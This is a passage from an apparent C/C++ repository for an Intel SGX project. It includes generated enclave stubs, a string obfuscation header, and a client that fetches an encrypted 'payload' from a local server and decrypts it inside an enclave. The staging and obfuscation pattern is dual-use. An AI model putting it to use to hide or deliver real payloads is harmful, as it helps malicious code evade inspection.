| typedef struct ms_sgx_thread_set_untrusted_event_ocall_t { 46 | int ms_retval; 47 | const void* ms_waiter; 48 | } ms_sgx_thread_set_untrusted_event_ocall_t; 49 | 50 | typedef struct ms_sgx_thread_setwait_untrusted_events_ocall_t { 51 | int ms_retval; 52 | const void* ms_waiter; 53 | const void* ms_self; 54 | } ms_sgx_thread_setwait_untrusted_events_ocall_t; 55 | 56 | typedef struct ms_sgx_thread_set_multiple_untrusted_events_ocall_t { 57 | int ms_retval; 58 | const void** ms_waiters; 59 | size_t ms_total; 60 | } ms_sgx_thread_set_multiple_untrusted_events_ocall_t; 61 | 62 | static sgx_status_t SGX_CDECL Enclave2_ocall_print(void* pms) 63 | { 64 | ms_ocall_print_t* ms = SGX_CAST(ms_ocall_print_t*, pms); 65 | ocall_print(ms->ms_str); 66 | 67 | return SGX_SUCCESS; 68 | } 69 | 70 | static sgx_status_t SGX_CDECL Enclave2_sgx_oc_cpuidex(void* pms) 71 | { 72 | ms_sgx_oc_cpuidex_t* ms = SGX_CAST(ms_sgx_oc_cpuidex_t*, pms); 73 | sgx_oc_cpuidex(ms->ms_cpuinfo, ms->ms_leaf, ms->ms_subleaf); 74 | 75 | return SGX_SUCCESS; 76 | } 77 | 78 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_wait_untrusted_event_ocall(void* pms) 79 | { 80 | ms_sgx_thread_wait_untrusted_event_ocall_t* ms = SGX_CAST(ms_sgx_thread_wait_untrusted_event_ocall_t*, pms); 81 | ms->ms_retval = sgx_thread_wait_untrusted_event_ocall(ms->ms_self); 82 | 83 | return SGX_SUCCESS; 84 | } 85 | 86 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_set_untrusted_event_ocall(void* pms) 87 | { 88 | ms_sgx_thread_set_untrusted_event_ocall_t* ms = SGX_CAST(ms_sgx_thread_set_untrusted_event_ocall_t*, pms); 89 | ms->ms_retval = sgx_thread_set_untrusted_event_ocall(ms->ms_waiter); 90 | 91 | return SGX_SUCCESS; 92 | } 93 | 94 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_setwait_untrusted_events_ocall(void* pms) 95 | { 96 | ms_sgx_thread_setwait_untrusted_events_ocall_t* ms = SGX_CAST(ms_sgx_thread_setwait_untrusted_events_ocall_t*, pms); 97 | ms->ms_retval = sgx_thread_setwait_untrusted_events_ocall(ms->ms_waiter, ms->ms_self); 98 | 99 | return SGX_SUCCESS; 100 | } 101 | 102 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_set_multiple_untrusted_events_ocall(void* pms) 103 | { 104 | ms_sgx_thread_set_multiple_untrusted_events_ocall_t* ms = SGX_CAST(ms_sgx_thread_set_multiple_untrusted_events_ocall_t*, pms); 105 | ms->ms_retval = sgx_thread_set_multiple_untrusted_events_ocall(ms->ms_waiters, ms->ms_total); 106 | 107 | return SGX_SUCCESS; 108 | } 109 | 110 | static const struct { 111 | size_t nr_ocall; 112 | void * func_addr[6]; 113 | } ocall_table_Enclave2 = { 114 | 6, 115 | { 116 | (void*)(uintptr_t)Enclave2_ocall_print, 117 | (void*)(uintptr_t)Enclave2_sgx_oc_cpuidex, 118 | (void*)(uintptr_t)Enclave2_sgx_thread_wait_untrusted_event_ocall, 119 | (void*)(uintptr_t)Enclave2_sgx_thread_set_untrusted_event_ocall, 120 | (void*)(uintptr_t)Enclave2_sgx_thread_setwait_untrusted_events_ocall, 121 | (void*)(uintptr_t)Enclave2_sgx_thread_set_multiple_untrusted_events_ocall, 122 | } 123 | }; 124 | 125 | sgx_status_t ecall_do_trusted(sgx_enclave_id_t eid, int* retval, int check) 126 | { 127 | sgx_status_t status; 128 | ms_ecall_do_trusted_t ms; 129 | ms.ms_check = check; 130 | status = sgx_ecall(eid, 0, &ocall_table_Enclave2, &ms); 131 | if (status == SGX_SUCCESS && retval) *retval = ms.ms_retval; 132 | return status; 133 | } 134 | 135 | sgx_status_t createRsaKeyPairEcall(sgx_enclave_id_t eid, char* public_key_raw_out, char* public_key_out, unsigned int KEY_SIZE) 136 | { 137 | sgx_status_t status; 138 | ms_createRsaKeyPairEcall_t ms; 139 | ms.ms_public_key_raw_out = public_key_raw_out; 140 | ms.ms_public_key_out = public_key_out; 141 | ms.ms_KEY_SIZE = KEY_SIZE; 142 | status = sgx_ecall(eid, 1, &ocall_table_Enclave2, &ms); 143 | return status; 144 | } 145 | 146 | sgx_status_t decryptPayloadEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len) 147 | { 148 | sgx_status_t status; 149 | ms_decryptPayloadEcall_t ms; 150 | ms.ms_encrypted_payload = encrypted_payload; 151 | ms.ms_encrypted_payload_len = encrypted_payload_len; 152 | status = sgx_ecall(eid, 2, &ocall_table_Enclave2, &ms); 153 | return status; 154 | } 155 | 156 | sgx_status_t decryptPayloadGetSizeEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len, size_t* decrypted_payload_len) 157 | { 158 | sgx_status_t status; 159 | ms_decryptPayloadGetSizeEcall_t ms; 160 | ms.ms_encrypted_payload = encrypted_payload; 161 | ms.ms_encrypted_payload_len = encrypted_payload_len; 162 | ms.ms_decrypted_payload_len = decrypted_payload_len; 163 | status = sgx_ecall(eid, 3, &ocall_table_Enclave2, &ms); 164 | return status; 165 | } 166 | 167 | sgx_status_t ecall_do_trusted_inside_ocall(sgx_enclave_id_t eid, int* retval) 168 | { 169 | sgx_status_t status; 170 | ms_ecall_do_trusted_inside_ocall_t ms; 171 | status = sgx_ecall(eid, 4, &ocall_table_Enclave2, &ms); 172 | if (status == SGX_SUCCESS && retval) *retval = ms.ms_retval; 173 | return status; 174 | } 175 | 176 | -------------------------------------------------------------------------------- /App/obfuscate.h: -------------------------------------------------------------------------------- 1 | /* --------------------------------- ABOUT ------------------------------------- 2 | 3 | Original Author: Adam Yaxley 4 | Website: https://github.com/adamyaxley 5 | License: See end of file 6 | 7 | Obfuscate 8 | Guaranteed compile-time string literal obfuscation library for C++14 9 | 10 | Usage: 11 | Pass string literals into the AY_OBFUSCATE macro to obfuscate them at compile 12 | time. AY_OBFUSCATE returns a reference to an ay::obfuscated_data object with the 13 | following traits: 14 | - Guaranteed obfuscation of string 15 | The passed string is encrypted with a simple XOR cipher at compile-time to 16 | prevent it being viewable in the binary image 17 | - Global lifetime 18 | The actual instantiation of the ay::obfuscated_data takes place inside a 19 | lambda as a function level static 20 | - Implicitly convertable to a char* 21 | This means that you can pass it directly into functions that would normally 22 | take a char* or a const char* 23 | 24 | Example: 25 | const char* obfuscated_string = AY_OBFUSCATE("Hello World"); 26 | std::cout << obfuscated_string << std::endl; 27 | 28 | ----------------------------------------------------------------------------- */ 29 | 30 | #include 31 | 32 | namespace ay 33 | { 34 | // Obfuscates a string at compile time 35 | template 36 | class obfuscator 37 | { 38 | public: 39 | // Obfuscates the string 'data' on construction 40 | constexpr obfuscator(const char* data) 41 | { 42 | static_assert(KEY != '\0', "KEY must not be the null character."); 43 | 44 | // On construction each of the characters in the string is 45 | // obfuscated with an XOR cipher based on KEY 46 | for (std::size_t i = 0; i < N; i++) 47 | { 48 | m_data[i] = data[i] ^ KEY; 49 | } 50 | } 51 | 52 | constexpr const char* getData() const 53 | { 54 | return &m_data[0]; 55 | } 56 | 57 | constexpr std::size_t getSize() const 58 | { 59 | return N; 60 | } 61 | 62 | constexpr char getKey() const 63 | { 64 | return KEY; 65 | } 66 | 67 | private: 68 | 69 | char m_data[N]{}; 70 | }; 71 | 72 | // Handles decryption and re-encryption of an encrypted string at runtime 73 | template 74 | class obfuscated_data 75 | { 76 | public: 77 | obfuscated_data(const obfuscator& obfuscator) 78 | { 79 | for (std::size_t i = 0; i < N; i++) 80 | { 81 | m_data[i] = obfuscator.getData()[i]; 82 | } 83 | } 84 | 85 | ~obfuscated_data() 86 | { 87 | // Zero m_data to remove it from memory 88 | for (std::size_t i = 0; i < N; i++) 89 | { 90 | m_data[i] = 0; 91 | } 92 | } 93 | 94 | // Returns a pointer to the plain text string, decrypting it if 95 | // necessary 96 | operator char*() 97 | { 98 | decrypt(); 99 | return m_data; 100 | } 101 | 102 | // Manually decrypt the string 103 | void decrypt() 104 | { 105 | if (is_encrypted()) 106 | { 107 | for (std::size_t i = 0; i < N; i++) 108 | { 109 | m_data[i] ^= KEY; 110 | } 111 | } 112 | } 113 | 114 | // Manually re-encrypt the string 115 | void encrypt() 116 | { 117 | if (!is_encrypted()) 118 | { 119 | for (std::size_t i = 0; i < N; i++) 120 | { 121 | m_data[i] ^= KEY; 122 | } 123 | } 124 | } 125 | 126 | // Returns true if this string is currently encrypted, false otherwise. 127 | bool is_encrypted() const 128 | { 129 | return m_data[N - 1] != '\0'; 130 | } 131 | 132 | private: 133 | 134 | // Local storage for the string. Call is_encrypted() to check whether or 135 | // not the string is currently obfuscated. 136 | char m_data[N]; 137 | }; 138 | 139 | // This function exists purely to extract the number of elements 'N' in the 140 | // array 'data' 141 | template 142 | constexpr auto make_obfuscator(const char(&data)[N]) 143 | { 144 | return obfuscator(data); 145 | } 146 | } 147 | 148 | // Obfuscates the string 'data' at compile-time and returns a reference to a 149 | // ay::obfuscated_data object with global lifetime that has functions for 150 | // decrypting the string and is also implicitly convertable to a char* 151 | #define AY_OBFUSCATE(data) AY_OBFUSCATE_KEY(data, '.') 152 | 153 | // Obfuscates the string 'data' with 'key' at compile-time and returns a 154 | // reference to a ay::obfuscated_data object with global lifetime that has 155 | // functions for decrypting the string and is also implicitly convertable to a 156 | // char* 157 | #define AY_OBFUSCATE_KEY(data, key) \ 158 | []() -> ay::obfuscated_data& { \ 159 | constexpr auto n = sizeof(data)/sizeof(data[0]); \ 160 | static_assert(data[n - 1] == '\0', "String must be null terminated"); \ 161 | constexpr auto obfuscator = ay::make_obfuscator(data); \ 162 | static auto obfuscated_data = ay::obfuscated_data(obfuscator); \ 163 | return obfuscated_data; \ 164 | }() 165 | 166 | /* -------------------------------- LICENSE ------------------------------------ 167 | 168 | Public Domain (http://www.unlicense.org) 169 | 170 | This is free and unencumbered software released into the public domain. 171 | 172 | Anyone is free to copy, modify, publish, use, compile, sell, or distribute this 173 | software, either in source code form or as a compiled binary, for any purpose, 174 | commercial or non-commercial, and by any means. 175 | 176 | In jurisdictions that recognize copyright laws, the author or authors of this 177 | software dedicate any and all copyright interest in the software to the public 178 | domain. We make this dedication for the benefit of the public at large and to 179 | the detriment of our heirs and successors. We intend this dedication to be an 180 | overt act of relinquishment in perpetuity of all present and future rights to 181 | this software under copyright law. 182 | 183 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 184 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS 185 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE 186 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF 187 | CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 188 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 189 | 190 | ----------------------------------------------------------------------------- */ 191 | -------------------------------------------------------------------------------- /App/App.cpp: -------------------------------------------------------------------------------- 1 | #include "Util.hpp" 2 | #include "App.hpp" 3 | 4 | #include "httplib.h" 5 | 6 | using namespace nlohmann; 7 | 8 | using namespace std; 9 | 10 | 11 | int main() 12 | { 13 | HINSTANCE bridgeLib; 14 | initEnclave initEnclaveStub; 15 | genPair genPairStub; 16 | storeSymKey storeSymKeyStub; 17 | decryptPayload decryptPayloadStub; 18 | destageEnclave destageEnclaveStub; 19 | UINT64 enclaveId; 20 | 21 | LPCWSTR bridgeDllName = _T("Bridge.dll"); 22 | char* enclaveSignedDllName = (char*) "Enclave2.signed.dll"; 23 | int ret; 24 | 25 | bridgeLib = importEBridge(bridgeDllName); 26 | if (NULL == bridgeLib) { 27 | cout << "Unable to import bridge dll. check you path?" << endl; 28 | return 1; 29 | } 30 | 31 | initEnclaveStub = checkInvoke(bridgeLib, (char*)"initEnclave"); 32 | genPairStub = checkInvoke(bridgeLib, (char*)"genPair"); 33 | storeSymKeyStub = checkInvoke(bridgeLib, (char*)"storeSymKey"); 34 | decryptPayloadStub = checkInvoke(bridgeLib, (char*)"decryptPayload"); 35 | destageEnclaveStub = checkInvoke(bridgeLib, (char*)"destageEnclave"); 36 | if (NULL == initEnclaveStub || 37 | NULL == genPairStub || 38 | NULL == storeSymKeyStub || 39 | NULL == decryptPayloadStub || 40 | NULL == destageEnclaveStub){ 41 | cout << "Unable to find one of the critical functions. Are they exported?" << endl; 42 | return 2; 43 | } 44 | 45 | // Init Enclave 46 | enclaveId = (initEnclaveStub)(enclaveSignedDllName); 47 | if (enclaveId == 0) { 48 | cout << "Unable to create enclave" << endl; 49 | return 3; 50 | } 51 | 52 | cout << "New Enclave id " << enclaveId << endl; 53 | 54 | // Generate Key(pub)/Key(pri) 55 | char* public_key = NULL; // send a pointer, bridge will fill it out 56 | ret = (genPairStub)(enclaveId, &public_key); 57 | if (ret == 0) { 58 | cout << "Unable to generate key pair" << endl; 59 | return 3; 60 | } 61 | 62 | cout << "A: public_key: " << endl; 63 | DumpHex(public_key, 388); 64 | // The library for now stores Key(pub) in files for the server to consume. 65 | // Once the server encrypted Key(sym) with Key(pub), come back here to proceed 66 | cout << "A: b64(public_key):" << endl; 67 | 68 | json public_key_j; 69 | public_key_j["mod"] = base64_encode((unsigned char*)public_key, PUB_KEY_MOD_SIZE).c_str(); 70 | public_key_j["exp"] = base64_encode((unsigned char*)(public_key + PUB_KEY_MOD_SIZE), PUB_KEY_EXP_SIZE).c_str(); 71 | 72 | std::string pkj = public_key_j.dump(); 73 | 74 | //WriteBufFile("b64.pub", public_key_j.dump().c_str(), pkj.length()); 75 | 76 | httplib::Client cli("http://127.0.0.1:8443"); 77 | auto res = cli.Post("/symkey", public_key_j.dump().c_str(), "application/json"); 78 | 79 | if (res->status == 200) { 80 | cout << res->body << endl; 81 | } 82 | else { 83 | auto err = res.error(); 84 | cout << err << endl; 85 | } 86 | 87 | string sym_key_response = res->body; 88 | 89 | cout << "http response" << endl; 90 | cout << sym_key_response << endl; 91 | 92 | cout << "J-Parsing http response" << endl; 93 | json symkeyPayJ = json::parse(sym_key_response); 94 | 95 | 96 | /*for (json::iterator it = symkeyPayJ.begin(); it != symkeyPayJ.end(); ++it) { 97 | std::cout << it.key() << " : " << it.value() << "\n"; 98 | }*/ 99 | 100 | 101 | vector symkeyDecoded = base64_decode(symkeyPayJ["key"]); 102 | unsigned char* symkeyRawEncrypted = reinterpret_cast(&symkeyDecoded[0]); 103 | 104 | size_t symkeyRawEncryptedSz = symkeyPayJ["len"]; 105 | cout << "Length of Raw Enc paylaod: " << symkeyRawEncryptedSz << endl; 106 | 107 | DumpHex(symkeyRawEncrypted, symkeyRawEncryptedSz); 108 | 109 | 110 | // Send Key(sym) to Enclave 111 | // It does enc/dec test 112 | ret = (storeSymKeyStub)(enclaveId, symkeyRawEncrypted); 113 | if (ret == 0) { 114 | cout << "Unable to store SymKey" << endl; 115 | return 3; 116 | } 117 | 118 | 119 | //-----------------get paylaod ----------------------------- 120 | 121 | 122 | 123 | res = cli.Get("/payload"); 124 | 125 | if (res->status != 200) { 126 | auto err = res.error(); 127 | cout << "Unable to fetch paylaod" << err << endl; 128 | return 3; 129 | } 130 | 131 | string payload_response = res->body; 132 | 133 | cout << "http response" << endl; 134 | cout << payload_response << endl; 135 | 136 | cout << "J-Parsing http response" << endl; 137 | json payloadPayJ = json::parse(payload_response); 138 | 139 | 140 | /*for (json::iterator it = symkeyPayJ.begin(); it != symkeyPayJ.end(); ++it) { 141 | std::cout << it.key() << " : " << it.value() << "\n"; 142 | }*/ 143 | 144 | 145 | vector payloadDecoded = base64_decode(payloadPayJ["payload"]); 146 | unsigned char* payloadRawEncrypted = reinterpret_cast(&payloadDecoded[0]); 147 | 148 | size_t payloadRawEncryptedSz = payloadPayJ["len"]; 149 | cout << "Length of Raw Enc payload: " << payloadRawEncryptedSz << endl; 150 | 151 | DumpHex(payloadRawEncrypted, payloadRawEncryptedSz); 152 | 153 | vector macDecoded = base64_decode(payloadPayJ["mac"]); 154 | unsigned char* macRaw = reinterpret_cast(&macDecoded[0]); 155 | cout << "Length of Raw MAC is 16" << endl; 156 | DumpHex(macRaw, 16); 157 | 158 | 159 | ret = (decryptPayloadStub)(enclaveId, payloadRawEncrypted, payloadRawEncryptedSz, macRaw); 160 | if (ret == 0) { 161 | cout << "Unable to decrypt payload" << endl; 162 | return 3; 163 | } 164 | 165 | //cout << "Hit Enter : "; 166 | //cin.ignore(); 167 | 168 | // Destroy memory resident enclave 169 | ret = (destageEnclaveStub)(enclaveId); 170 | if (ret == 0) { 171 | cout << "Unable to destage enclave" << endl; 172 | return 3; 173 | } 174 | 175 | cout << "Done!" << endl; 176 | FreeLibrary(bridgeLib); 177 | 178 | return 0; 179 | } 180 | 181 | 182 | template 183 | T checkInvoke(HINSTANCE& dllHandle, char* funcName) { 184 | 185 | T fn = (T)GetProcAddress(dllHandle, funcName); 186 | 187 | if (NULL != fn) 188 | return fn; 189 | else 190 | return NULL; 191 | } 192 | 193 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Build results 17 | [Dd]ebug/ 18 | [Dd]ebugPublic/ 19 | [Rr]elease/ 20 | [Rr]eleases/ 21 | x64/ 22 | x86/ 23 | [Aa][Rr][Mm]/ 24 | [Aa][Rr][Mm]64/ 25 | bld/ 26 | [Bb]in/ 27 | [Oo]bj/ 28 | [Ll]og/ 29 | 30 | # Visual Studio 2015/2017 cache/options directory 31 | .vs/ 32 | # Uncomment if you have tasks that create the project's static files in wwwroot 33 | #wwwroot/ 34 | 35 | # Visual Studio 2017 auto generated files 36 | Generated\ Files/ 37 | 38 | # MSTest test Results 39 | [Tt]est[Rr]esult*/ 40 | [Bb]uild[Ll]og.* 41 | 42 | # NUNIT 43 | *.VisualState.xml 44 | TestResult.xml 45 | 46 | # Build Results of an ATL Project 47 | [Dd]ebugPS/ 48 | [Rr]eleasePS/ 49 | dlldata.c 50 | 51 | # Benchmark Results 52 | BenchmarkDotNet.Artifacts/ 53 | 54 | # .NET Core 55 | project.lock.json 56 | project.fragment.lock.json 57 | artifacts/ 58 | 59 | # StyleCop 60 | StyleCopReport.xml 61 | 62 | # Files built by Visual Studio 63 | *_i.c 64 | *_p.c 65 | *_h.h 66 | *.ilk 67 | *.meta 68 | *.obj 69 | *.iobj 70 | *.pch 71 | *.pdb 72 | *.ipdb 73 | *.pgc 74 | *.pgd 75 | *.rsp 76 | *.sbr 77 | *.tlb 78 | *.tli 79 | *.tlh 80 | *.tmp 81 | *.tmp_proj 82 | *_wpftmp.csproj 83 | *.log 84 | *.vspscc 85 | *.vssscc 86 | .builds 87 | *.pidb 88 | *.svclog 89 | *.scc 90 | 91 | # Chutzpah Test files 92 | _Chutzpah* 93 | 94 | # Visual C++ cache files 95 | ipch/ 96 | *.aps 97 | *.ncb 98 | *.opendb 99 | *.opensdf 100 | *.sdf 101 | *.cachefile 102 | *.VC.db 103 | *.VC.VC.opendb 104 | 105 | # Visual Studio profiler 106 | *.psess 107 | *.vsp 108 | *.vspx 109 | *.sap 110 | 111 | # Visual Studio Trace Files 112 | *.e2e 113 | 114 | # TFS 2012 Local Workspace 115 | $tf/ 116 | 117 | # Guidance Automation Toolkit 118 | *.gpState 119 | 120 | # ReSharper is a .NET coding add-in 121 | _ReSharper*/ 122 | *.[Rr]e[Ss]harper 123 | *.DotSettings.user 124 | 125 | # JustCode is a .NET coding add-in 126 | .JustCode 127 | 128 | # TeamCity is a build add-in 129 | _TeamCity* 130 | 131 | # DotCover is a Code Coverage Tool 132 | *.dotCover 133 | 134 | # AxoCover is a Code Coverage Tool 135 | .axoCover/* 136 | !.axoCover/settings.json 137 | 138 | # Visual Studio code coverage results 139 | *.coverage 140 | *.coveragexml 141 | 142 | # NCrunch 143 | _NCrunch_* 144 | .*crunch*.local.xml 145 | nCrunchTemp_* 146 | 147 | # MightyMoose 148 | *.mm.* 149 | AutoTest.Net/ 150 | 151 | # Web workbench (sass) 152 | .sass-cache/ 153 | 154 | # Installshield output folder 155 | [Ee]xpress/ 156 | 157 | # DocProject is a documentation generator add-in 158 | DocProject/buildhelp/ 159 | DocProject/Help/*.HxT 160 | DocProject/Help/*.HxC 161 | DocProject/Help/*.hhc 162 | DocProject/Help/*.hhk 163 | DocProject/Help/*.hhp 164 | DocProject/Help/Html2 165 | DocProject/Help/html 166 | 167 | # Click-Once directory 168 | publish/ 169 | 170 | # Publish Web Output 171 | *.[Pp]ublish.xml 172 | *.azurePubxml 173 | # Note: Comment the next line if you want to checkin your web deploy settings, 174 | # but database connection strings (with potential passwords) will be unencrypted 175 | *.pubxml 176 | *.publishproj 177 | 178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 179 | # checkin your Azure Web App publish settings, but sensitive information contained 180 | # in these scripts will be unencrypted 181 | PublishScripts/ 182 | 183 | # NuGet Packages 184 | *.nupkg 185 | # The packages folder can be ignored because of Package Restore 186 | **/[Pp]ackages/* 187 | # except build/, which is used as an MSBuild target. 188 | !**/[Pp]ackages/build/ 189 | # Uncomment if necessary however generally it will be regenerated when needed 190 | #!**/[Pp]ackages/repositories.config 191 | # NuGet v3's project.json files produces more ignorable files 192 | *.nuget.props 193 | *.nuget.targets 194 | 195 | # Microsoft Azure Build Output 196 | csx/ 197 | *.build.csdef 198 | 199 | # Microsoft Azure Emulator 200 | ecf/ 201 | rcf/ 202 | 203 | # Windows Store app package directories and files 204 | AppPackages/ 205 | BundleArtifacts/ 206 | Package.StoreAssociation.xml 207 | _pkginfo.txt 208 | *.appx 209 | 210 | # Visual Studio cache files 211 | # files ending in .cache can be ignored 212 | *.[Cc]ache 213 | # but keep track of directories ending in .cache 214 | !?*.[Cc]ache/ 215 | 216 | # Others 217 | ClientBin/ 218 | ~$* 219 | *~ 220 | *.dbmdl 221 | *.dbproj.schemaview 222 | *.jfm 223 | *.pfx 224 | *.publishsettings 225 | orleans.codegen.cs 226 | 227 | # Including strong name files can present a security risk 228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 229 | #*.snk 230 | 231 | # Since there are multiple workflows, uncomment next line to ignore bower_components 232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 233 | #bower_components/ 234 | 235 | # RIA/Silverlight projects 236 | Generated_Code/ 237 | 238 | # Backup & report files from converting an old project file 239 | # to a newer Visual Studio version. Backup files are not needed, 240 | # because we have git ;-) 241 | _UpgradeReport_Files/ 242 | Backup*/ 243 | UpgradeLog*.XML 244 | UpgradeLog*.htm 245 | ServiceFabricBackup/ 246 | *.rptproj.bak 247 | 248 | # SQL Server files 249 | *.mdf 250 | *.ldf 251 | *.ndf 252 | 253 | # Business Intelligence projects 254 | *.rdl.data 255 | *.bim.layout 256 | *.bim_*.settings 257 | *.rptproj.rsuser 258 | *- Backup*.rdl 259 | 260 | # Microsoft Fakes 261 | FakesAssemblies/ 262 | 263 | # GhostDoc plugin setting file 264 | *.GhostDoc.xml 265 | 266 | # Node.js Tools for Visual Studio 267 | .ntvs_analysis.dat 268 | node_modules/ 269 | 270 | # Visual Studio 6 build log 271 | *.plg 272 | 273 | # Visual Studio 6 workspace options file 274 | *.opt 275 | 276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 277 | *.vbw 278 | 279 | # Visual Studio LightSwitch build output 280 | **/*.HTMLClient/GeneratedArtifacts 281 | **/*.DesktopClient/GeneratedArtifacts 282 | **/*.DesktopClient/ModelManifest.xml 283 | **/*.Server/GeneratedArtifacts 284 | **/*.Server/ModelManifest.xml 285 | _Pvt_Extensions 286 | 287 | # Paket dependency manager 288 | .paket/paket.exe 289 | paket-files/ 290 | 291 | # FAKE - F# Make 292 | .fake/ 293 | 294 | # JetBrains Rider 295 | .idea/ 296 | *.sln.iml 297 | 298 | # CodeRush personal settings 299 | .cr/personal 300 | 301 | # Python Tools for Visual Studio (PTVS) 302 | __pycache__/ 303 | *.pyc 304 | 305 | # Cake - Uncomment if you are using it 306 | # tools/** 307 | # !tools/packages.config 308 | 309 | # Tabs Studio 310 | *.tss 311 | 312 | # Telerik's JustMock configuration file 313 | *.jmconfig 314 | 315 | # BizTalk build output 316 | *.btp.cs 317 | *.btm.cs 318 | *.odx.cs 319 | *.xsd.cs 320 | 321 | # OpenCover UI analysis results 322 | OpenCover/ 323 | 324 | # Azure Stream Analytics local run output 325 | ASALocalRun/ 326 | 327 | # MSBuild Binary and Structured Log 328 | *.binlog 329 | 330 | # NVidia Nsight GPU debugger configuration file 331 | *.nvuser 332 | 333 | # MFractors (Xamarin productivity tool) working folder 334 | .mfractor/ 335 | 336 | # Local History for Visual Studio 337 | .localhistory/ 338 | 339 | # BeatPulse healthcheck temp database 340 | healthchecksdb 341 | 342 | 343 | # Prerequisites 344 | *.d 345 | 346 | # Compiled Object files 347 | *.slo 348 | *.lo 349 | *.o 350 | *.obj 351 | 352 | # Precompiled Headers 353 | *.gch 354 | *.pch 355 | 356 | # Compiled Dynamic libraries 357 | *.so 358 | *.dylib 359 | *.dll 360 | 361 | # Fortran module files 362 | *.mod 363 | *.smod 364 | 365 | # Compiled Static libraries 366 | *.lai 367 | *.la 368 | *.a 369 | *.lib 370 | 371 | # Executables 372 | *.exe 373 | *.out 374 | *.app -------------------------------------------------------------------------------- /Bridge/Bridge.cpp: -------------------------------------------------------------------------------- 1 | #include "Bridge.h" 2 | #include "Util.cpp" 3 | 4 | // Warning C26812 The enum type is unscoped. 5 | #pragma warning( disable : 26812 ) 6 | 7 | using namespace std; 8 | 9 | void ocall_print(const char* str) 10 | { 11 | std::cout << str; 12 | } 13 | 14 | void print_error_message(sgx_status_t ret) 15 | { 16 | size_t idx = 0; 17 | size_t ttl = sizeof sgx_errlist / sizeof sgx_errlist[0]; 18 | 19 | for (idx = 0; idx < ttl; idx++) { 20 | if (ret == sgx_errlist[idx].err) { 21 | if (NULL != sgx_errlist[idx].sug) 22 | printf("Info: %s\n", sgx_errlist[idx].sug); 23 | printf("Error: %s\n", sgx_errlist[idx].msg); 24 | break; 25 | } 26 | } 27 | 28 | if (idx == ttl) 29 | printf("Error code is 0x%X. Please refer to the \"Intel SGX SDK Developer Reference\" for more details.\n", ret); 30 | } 31 | 32 | sgx_enclave_id_t createEnclave(char* encalaveSignedFile){ 33 | 34 | sgx_launch_token_t token = { 0 }; 35 | sgx_launch_token_t* launchToken = NULL; 36 | sgx_enclave_id_t eid; 37 | int updated = 0; // new ephemeral token 38 | 39 | ret = sgx_create_enclavea(encalaveSignedFile, SGX_DEBUG_FLAG, &token, &updated, 40 | &eid, NULL); 41 | if (ret != SGX_SUCCESS) 42 | { 43 | print_error_message(ret); 44 | return CANNOT_CONTINUE; 45 | } 46 | 47 | return eid; 48 | } 49 | ///

50 | /// checkECapabilioty checks if this is an SGX capable platform 51 | ///

52 | /// 53 | /// 1 - Platform is SGX enabled or the Software Control Interface is available to configure SGX 54 | /// 0 - SGX not available 55 | /// XX - SGX Error code 56 | /// 57 | extern "C" int checkECapability() { 58 | int sgx_capable = 0; 59 | ret = sgx_is_capable(&sgx_capable); 60 | if (ret != SGX_SUCCESS) 61 | { 62 | print_error_message(ret); 63 | return CANNOT_CONTINUE; 64 | } 65 | return TRUE; 66 | } 67 | 68 | extern "C" int enableSGXEFI() { 69 | sgx_device_status_t devstatus; 70 | ret = sgx_cap_enable_device(&devstatus); 71 | if (ret != SGX_SUCCESS) 72 | { 73 | print_error_message(ret); 74 | return CANNOT_CONTINUE; 75 | } 76 | 77 | switch (devstatus) 78 | { 79 | case SGX_ENABLED: 80 | cout << "Platform ready to use" << endl; 81 | return CAN_CONTINUE; 82 | 83 | case SGX_DISABLED_REBOOT_REQUIRED: 84 | cout << "A reboot is required to finish enabling SGX" << endl; 85 | return CANNOT_CONTINUE; 86 | 87 | case SGX_DISABLED_LEGACY_OS: 88 | cout << "SGX is disabled and a Software Control Interface is not available to enable it" << endl; 89 | return CANNOT_CONTINUE; 90 | 91 | case SGX_DISABLED: 92 | cout << "SGX is not enabled on this platform. More details are unavailable." << endl; 93 | return CANNOT_CONTINUE; 94 | 95 | case SGX_DISABLED_SCI_AVAILABLE: 96 | cout << "SGX is disabled, but a Software Control Interface is available to enable it." << endl; 97 | return CANNOT_CONTINUE; 98 | 99 | case SGX_DISABLED_MANUAL_ENABLE: 100 | cout << "SGX is disabled, but can be enabled manually in the BIOS setup" << endl; 101 | return CANNOT_CONTINUE; 102 | 103 | case SGX_DISABLED_HYPERV_ENABLED: 104 | cout << "Detected an unsupported version of Windows* 10 with Hyper-V enabled" << endl; 105 | return CANNOT_CONTINUE; 106 | 107 | case SGX_DISABLED_UNSUPPORTED_CPU: 108 | cout << "SGX is not supported by this CPU" << endl; 109 | return CANNOT_CONTINUE; 110 | 111 | default: 112 | cout << "SGX capabilities unknown. This should not happen" << endl; 113 | return CANNOT_CONTINUE; 114 | } 115 | } 116 | 117 | extern "C" uint64_t initEnclave(char* enclaveSignedFile) { 118 | ret = SGX_ERROR_UNEXPECTED; 119 | 120 | sgx_enclave_id_t eid; 121 | 122 | int callRet = 0; 123 